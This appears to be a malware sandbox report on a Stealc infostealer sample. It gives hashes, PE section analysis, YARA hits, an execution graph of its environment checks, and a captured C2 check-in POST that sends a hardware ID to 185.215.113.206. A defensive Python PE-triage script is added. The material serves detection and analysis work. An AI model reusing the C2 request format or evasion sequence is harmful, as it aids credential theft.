                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
IP context (other samples seen contacting the same IP):
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                        No context
ASN context (other samples seen contacting the same ASN):
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.94546065873633
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'798'144 bytes
                        MD5:915ecb2949f1c2ad737caa35856b4584
                        SHA1:deaf66961d8b2dda755377ab791b8907b71cf9b5
                        SHA256:9784693e6d3fe06c253e47536652da2ac85aa94b2d05d83230b2f9734529f854
                        SHA512:bb015aeefc7151b3976e7643a143a0b9e3c47ab93d876186af9bd5dd582e900e21662f177f62021db803289b38d69839d26d463bf7d954ef8ab319289346cf0a
                        SSDEEP:49152:aIGvHJ5IqgYd4DInvoXmnNDCcdYUDSJ5wup:aIUIqgYd40nvNDp45Rp
                        TLSH:FD8533DD29AA43F8F0E22B3917E162FD6A51950444E423651F9FA8CFF8B4B0793794D0
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0xa94000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, 0xa94000 in .taggant):
jmp 00007FD97882C5FAh
cmovle ebx, dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
(the remaining 92 lines of the listing are all "add byte ptr [eax], al": the bytes after the entry-point jump are zeros, and the two-byte sequence 00 00 disassembles to that instruction)
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x249000 | 0x16200 | 7b48a3b3539ce95e43fb7fdb6fb51ca1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 07fcc5af7ddad7d6c154e625a6635903 | False | 0.796875 | data | 6.028361727806696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x24c000 | 0x2a9000 | 0x200 | 6fa911217c02cd1e146ec67a928879a2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
enovjnaf | 0x4f5000 | 0x19e000 | 0x19d200 | 28a16bbeab16bf81fb8bc3778bfff1fb | False | 0.9947812263615734 | data | 7.954450679533088 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oxoldoae | 0x693000 | 0x1000 | 0x400 | 4df15ce44e18016618c369444fc9cc7a | False | 0.763671875 | data | 6.0238903316739965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x694000 | 0x3000 | 0x2200 | 2a1eff96a9f2c8a3af854eebd2980b0d | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x691e44 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535

Imports:
DLL | Import
kernel32.dll | lstrcpy
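The section table is where the static side of this verdict comes from: the entry point sits in .taggant rather than .text, every section that carries code is readable, writable and executable at once, and the 1.6 MB enovjnaf section has an entropy of 7.95 bits per byte, which together with the single kernel32!lstrcpy import and the Oreans.vxd / Software\WinLicense strings listed in the evasion section is characteristic of an Oreans Themida/WinLicense-protected binary. The script below is an added example, not Joe Sandbox code and not the sample's own code: it parses the DOS, COFF and optional headers and the section table with nothing but struct, then applies those three checks. The PE it analyses is constructed inline by build_sample_pe() to mirror the report's layout (an unnamed RWX section, a high-entropy section named enovjnaf, the entry point inside .taggant); the section names, sizes and bytes are assumptions for the demo, not the sample's.

```python
"""Section-header triage for a PE32 image (added example, not report code)."""
import hashlib
import math
import struct

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
SCN_INITIALIZED = 0x00000040      # IMAGE_SCN_CNT_INITIALIZED_DATA
SCN_EXECUTE = 0x20000000          # IMAGE_SCN_MEM_EXECUTE
SCN_READ = 0x40000000             # IMAGE_SCN_MEM_READ
SCN_WRITE = 0x80000000            # IMAGE_SCN_MEM_WRITE


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; packed or encrypted data sits near 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) for a PE32/PE32+ image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]    # COFF +2
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]    # COFF +16
    opt = e_lfanew + 24                        # optional header follows COFF
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]        # same offset in PE32/PE32+
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i          # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        flags = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "flags": flags,
                         "raw": pe[rawptr:rawptr + rawsize]})
    return entry_rva, sections


def triage(pe: bytes) -> dict:
    """The three static checks behind the report's section-related signatures."""
    entry_rva, sections = parse_sections(pe)
    entry_section = next((s["name"] for s in sections if s["va"] <= entry_rva
                          < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    return {
        "entry_section": entry_section,
        "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
        "rwx_sections": [s["name"] for s in sections
                         if s["flags"] & SCN_EXECUTE and s["flags"] & SCN_WRITE],
        "nonstandard_names": [s["name"] for s in sections
                              if s["name"] not in STANDARD_SECTIONS],
        "high_entropy": [s["name"] for s in sections if entropy(s["raw"]) > 7.5],
    }


def build_sample_pe() -> bytes:
    """Construct a small PE32 whose section table mirrors the report's shape (assumed layout)."""
    file_align, sect_align, e_lfanew = 0x200, 0x1000, 0x40
    # Deterministic pseudo-random bytes stand in for the packed payload.
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))
    rwx = SCN_INITIALIZED | SCN_EXECUTE | SCN_READ | SCN_WRITE
    layout = [                                 # (name, characteristics, raw data)
        (b"",         rwx,                                    b"\xcc" * 0x200),
        (b".rsrc",    SCN_INITIALIZED | SCN_READ | SCN_WRITE, b"\x00" * 0x200),
        (b"enovjnaf", rwx,                                    packed),
        (b".taggant", rwx,                                    b"\xe9" + b"\x00" * 0x1ff),
    ]
    headers, blobs = b"", b""
    va, rawptr, entry_rva = sect_align, file_align, 0
    for name, flags, data in layout:
        data = data.ljust(-(-len(data) // file_align) * file_align, b"\0")
        if name == b".taggant":
            entry_rva = va                     # entry point inside .taggant, as in the sample
        headers += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data),
                               rawptr, 0, 0, 0, 0, flags)
        blobs += data
        va += -(-len(data) // sect_align) * sect_align
        rawptr += len(data)
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, sect_align,
                      0, 0x400000, sect_align, file_align).ljust(224, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, len(opt), 0x0102)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    return (dos + b"PE\0\0" + coff + opt + headers).ljust(file_align, b"\0") + blobs


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run it against a real file with `triage(open(path, "rb").read())`. The 7.5 threshold is a triage cut-off, not proof of packing: legitimately compressed resources score similarly, so treat a hit together with the entry-point and RWX findings rather than on its own.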
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-23T16:54:02.395097+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 23, 2024 16:54:00.463327885 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:00.589762926 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:00.589860916 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:00.590092897 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:00.709779978 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:01.938766003 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:01.938855886 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:01.942598104 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:02.064785004 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:02.394994974 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:02.395097017 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:06.047066927 CET4970480192.168.2.5185.215.113.206
                        • 185.215.113.206
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704185.215.113.206805296C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 23, 2024 16:54:00.590092897 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 23, 2024 16:54:01.938766003 CET203INHTTP/1.1 200 OK
                        Date: Sat, 23 Nov 2024 15:54:01 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 23, 2024 16:54:01.942598104 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIE
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 42 32 38 44 30 44 45 31 33 45 34 32 35 35 38 33 30 34 33 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a
                        Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"93B28D0DE13E4255830438------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
                        Nov 23, 2024 16:54:02.394994974 CET | 210 | IN | HTTP/1.1 200 OK
                        Date: Sat, 23 Nov 2024 15:54:02 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Target ID:0
                        Start time:10:53:57
                        Start date:23/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x510000
                        File size:1'798'144 bytes
                        MD5 hash:915ECB2949F1C2AD737CAA35856B4584
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:4.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.3%
                          Total number of Nodes:1405
                          Total number of Limit Nodes:28
                          execution_graph 27233 532853 lstrcpy 27244 532cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27256 523959 244 API calls 27261 5201d9 126 API calls 27245 533cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27285 5333c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27271 528615 49 API calls 27286 528615 48 API calls 27234 52e049 147 API calls 25796 531bf0 25848 512a90 25796->25848 25800 531c03 25801 531c29 lstrcpy 25800->25801 25802 531c35 25800->25802 25801->25802 25803 531c65 ExitProcess 25802->25803 25804 531c6d GetSystemInfo 25802->25804 25805 531c85 25804->25805 25806 531c7d ExitProcess 25804->25806 25949 511030 GetCurrentProcess VirtualAllocExNuma 25805->25949 25811 531ca2 25812 531cb8 25811->25812 25813 531cb0 ExitProcess 25811->25813 25961 532ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25812->25961 25815 531ce7 lstrlen 25820 531cff 25815->25820 25816 531cbd 25816->25815 26170 532a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25816->26170 25818 531cd1 25818->25815 25822 531ce0 ExitProcess 25818->25822 25819 531d23 lstrlen 25821 531d39 25819->25821 25820->25819 25823 531d13 lstrcpy lstrcat 25820->25823 25824 531d5a 25821->25824 25826 531d46 lstrcpy lstrcat 25821->25826 25823->25819 25825 532ad0 3 API calls 25824->25825 25827 531d5f lstrlen 25825->25827 25826->25824 25829 531d74 25827->25829 25828 531d9a lstrlen 25830 531db0 25828->25830 25829->25828 25831 531d87 lstrcpy lstrcat 25829->25831 25832 531dce 25830->25832 25833 531dba lstrcpy lstrcat 25830->25833 25831->25828 25963 532a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25832->25963 25833->25832 25835 531dd3 lstrlen 25836 531de7 25835->25836 25837 531df7 lstrcpy lstrcat 25836->25837 25838 531e0a 25836->25838 25837->25838 25839 531e28 lstrcpy 25838->25839 25840 531e30 25838->25840 25839->25840 25841 531e56 OpenEventA 25840->25841 25842 531e68 CloseHandle Sleep OpenEventA 25841->25842 25843 531e8c CreateEventA 25841->25843 25842->25842 25842->25843 
25964 531b20 GetSystemTime 25843->25964 25847 531ea5 CloseHandle ExitProcess 26171 514a60 25848->26171 25850 512aa1 25851 514a60 2 API calls 25850->25851 25852 512ab7 25851->25852 25853 514a60 2 API calls 25852->25853 25854 512acd 25853->25854 25855 514a60 2 API calls 25854->25855 25856 512ae3 25855->25856 25857 514a60 2 API calls 25856->25857 25858 512af9 25857->25858 25859 514a60 2 API calls 25858->25859 25860 512b0f 25859->25860 25861 514a60 2 API calls 25860->25861 25862 512b28 25861->25862 25863 514a60 2 API calls 25862->25863 25864 512b3e 25863->25864 25865 514a60 2 API calls 25864->25865 25866 512b54 25865->25866 25867 514a60 2 API calls 25866->25867 25868 512b6a 25867->25868 25869 514a60 2 API calls 25868->25869 25870 512b80 25869->25870 25871 514a60 2 API calls 25870->25871 25872 512b96 25871->25872 25873 514a60 2 API calls 25872->25873 25874 512baf 25873->25874 25875 514a60 2 API calls 25874->25875 25876 512bc5 25875->25876 25877 514a60 2 API calls 25876->25877 25878 512bdb 25877->25878 25879 514a60 2 API calls 25878->25879 25880 512bf1 25879->25880 25881 514a60 2 API calls 25880->25881 25882 512c07 25881->25882 25883 514a60 2 API calls 25882->25883 25884 512c1d 25883->25884 25885 514a60 2 API calls 25884->25885 25886 512c36 25885->25886 25887 514a60 2 API calls 25886->25887 25888 512c4c 25887->25888 25889 514a60 2 API calls 25888->25889 25890 512c62 25889->25890 25891 514a60 2 API calls 25890->25891 25892 512c78 25891->25892 25893 514a60 2 API calls 25892->25893 25894 512c8e 25893->25894 25895 514a60 2 API calls 25894->25895 25896 512ca4 25895->25896 25897 514a60 2 API calls 25896->25897 25898 512cbd 25897->25898 25899 514a60 2 API calls 25898->25899 25900 512cd3 25899->25900 25901 514a60 2 API calls 25900->25901 25902 512ce9 25901->25902 25903 514a60 2 API calls 25902->25903 25904 512cff 25903->25904 25905 514a60 2 API calls 25904->25905 25906 512d15 25905->25906 25907 514a60 2 API calls 25906->25907 25908 512d2b 25907->25908 25909 514a60 2 API calls 
25908->25909 25910 512d44 25909->25910 25911 514a60 2 API calls 25910->25911 25912 512d5a 25911->25912 25913 514a60 2 API calls 25912->25913 25914 512d70 25913->25914 25915 514a60 2 API calls 25914->25915 25916 512d86 25915->25916 25917 514a60 2 API calls 25916->25917 25918 512d9c 25917->25918 25919 514a60 2 API calls 25918->25919 25920 512db2 25919->25920 25921 514a60 2 API calls 25920->25921 25922 512dcb 25921->25922 25923 514a60 2 API calls 25922->25923 25924 512de1 25923->25924 25925 514a60 2 API calls 25924->25925 25926 512df7 25925->25926 25927 514a60 2 API calls 25926->25927 25928 512e0d 25927->25928 25929 514a60 2 API calls 25928->25929 25930 512e23 25929->25930 25931 514a60 2 API calls 25930->25931 25932 512e39 25931->25932 25933 514a60 2 API calls 25932->25933 25934 512e52 25933->25934 25935 536390 GetPEB 25934->25935 25936 5365c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25935->25936 25937 5363c3 25935->25937 25938 536625 GetProcAddress 25936->25938 25939 536638 25936->25939 25944 5363d7 20 API calls 25937->25944 25938->25939 25940 536641 GetProcAddress GetProcAddress 25939->25940 25941 53666c 25939->25941 25940->25941 25942 536675 GetProcAddress 25941->25942 25943 536688 25941->25943 25942->25943 25945 536691 GetProcAddress 25943->25945 25946 5366a4 25943->25946 25944->25936 25945->25946 25947 5366d7 25946->25947 25948 5366ad GetProcAddress GetProcAddress 25946->25948 25947->25800 25948->25947 25950 511057 ExitProcess 25949->25950 25951 51105e VirtualAlloc 25949->25951 25952 51107d 25951->25952 25953 5110b1 25952->25953 25954 51108a VirtualFree 25952->25954 25955 5110c0 25953->25955 25954->25953 25956 5110d0 GlobalMemoryStatusEx 25955->25956 25958 511112 ExitProcess 25956->25958 25959 5110f5 25956->25959 25959->25958 25960 51111a GetUserDefaultLangID 25959->25960 25960->25811 25960->25812 25962 532b24 25961->25962 25962->25816 25963->25835 26176 531820 25964->26176 25966 531b81 sscanf 26215 512a20 25966->26215 25969 531bd6 25970 
531be9 25969->25970 25971 531be2 ExitProcess 25969->25971 25972 52ffd0 25970->25972 25973 52ffe0 25972->25973 25974 530019 lstrlen 25973->25974 25975 53000d lstrcpy 25973->25975 25976 5300d0 25974->25976 25975->25974 25977 5300e7 lstrlen 25976->25977 25978 5300db lstrcpy 25976->25978 25979 5300ff 25977->25979 25978->25977 25980 530116 lstrlen 25979->25980 25981 53010a lstrcpy 25979->25981 25982 53012e 25980->25982 25981->25980 25983 530145 25982->25983 25984 530139 lstrcpy 25982->25984 26217 531570 25983->26217 25984->25983 25987 53016e 25988 530183 lstrcpy 25987->25988 25989 53018f lstrlen 25987->25989 25988->25989 25990 5301a8 25989->25990 25991 5301c9 lstrlen 25990->25991 25992 5301bd lstrcpy 25990->25992 25993 5301e8 25991->25993 25992->25991 25994 530200 lstrcpy 25993->25994 25995 53020c lstrlen 25993->25995 25994->25995 25996 53026a 25995->25996 25997 530282 lstrcpy 25996->25997 25998 53028e 25996->25998 25997->25998 26227 512e70 25998->26227 26006 530540 26007 531570 4 API calls 26006->26007 26008 53054f 26007->26008 26009 5305a1 lstrlen 26008->26009 26010 530599 lstrcpy 26008->26010 26011 5305bf 26009->26011 26010->26009 26012 5305d1 lstrcpy lstrcat 26011->26012 26013 5305e9 26011->26013 26012->26013 26014 530614 26013->26014 26015 53060c lstrcpy 26013->26015 26016 53061b lstrlen 26014->26016 26015->26014 26017 530636 26016->26017 26018 53064a lstrcpy lstrcat 26017->26018 26019 530662 26017->26019 26018->26019 26020 530687 26019->26020 26021 53067f lstrcpy 26019->26021 26022 53068e lstrlen 26020->26022 26021->26020 26023 5306b3 26022->26023 26024 5306c7 lstrcpy lstrcat 26023->26024 26025 5306db 26023->26025 26024->26025 26026 530704 lstrcpy 26025->26026 26027 53070c 26025->26027 26026->26027 26028 530751 26027->26028 26029 530749 lstrcpy 26027->26029 26983 532740 GetWindowsDirectoryA 26028->26983 26029->26028 26031 530785 26992 514c50 26031->26992 26032 53075d 26032->26031 26034 53077d lstrcpy 26032->26034 26034->26031 26035 53078f 27146 528ca0 StrCmpCA 
26035->27146 26037 53079b 26038 511530 8 API calls 26037->26038 26039 5307bc 26038->26039 26040 5307e5 lstrcpy 26039->26040 26041 5307ed 26039->26041 26040->26041 27164 5160d0 80 API calls 26041->27164 26043 5307fa 27165 5281b0 10 API calls 26043->27165 26045 530809 26046 511530 8 API calls 26045->26046 26047 53082f 26046->26047 26048 530856 lstrcpy 26047->26048 26049 53085e 26047->26049 26048->26049 27166 5160d0 80 API calls 26049->27166 26051 53086b 27167 527ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26051->27167 26053 530876 26054 511530 8 API calls 26053->26054 26055 5308a1 26054->26055 26056 5308d5 26055->26056 26057 5308c9 lstrcpy 26055->26057 27168 5160d0 80 API calls 26056->27168 26057->26056 26059 5308db 27169 528050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26059->27169 26061 5308e6 26062 511530 8 API calls 26061->26062 26063 5308f7 26062->26063 26064 530926 lstrcpy 26063->26064 26065 53092e 26063->26065 26064->26065 27170 515640 8 API calls 26065->27170 26067 530933 26068 511530 8 API calls 26067->26068 26069 53094c 26068->26069 27171 527280 1500 API calls 26069->27171 26071 53099f 26072 511530 8 API calls 26071->26072 26073 5309cf 26072->26073 26074 5309f6 lstrcpy 26073->26074 26075 5309fe 26073->26075 26074->26075 27172 5160d0 80 API calls 26075->27172 26077 530a0b 27173 5283e0 7 API calls 26077->27173 26079 530a18 26080 511530 8 API calls 26079->26080 26081 530a29 26080->26081 27174 5124e0 230 API calls 26081->27174 26083 530a6b 26084 530b40 26083->26084 26085 530a7f 26083->26085 26087 511530 8 API calls 26084->26087 26086 511530 8 API calls 26085->26086 26088 530aa5 26086->26088 26090 530b59 26087->26090 26091 530ad4 26088->26091 26092 530acc lstrcpy 26088->26092 26089 530b87 27178 5160d0 80 API calls 26089->27178 26090->26089 26093 530b7f lstrcpy 26090->26093 27175 5160d0 80 API calls 26091->27175 26092->26091 26093->26089 26096 530b8d 27179 52c840 70 API calls 26096->27179 26097 530ada 27176 5285b0 47 API calls 26097->27176 26100 530b38 26103 
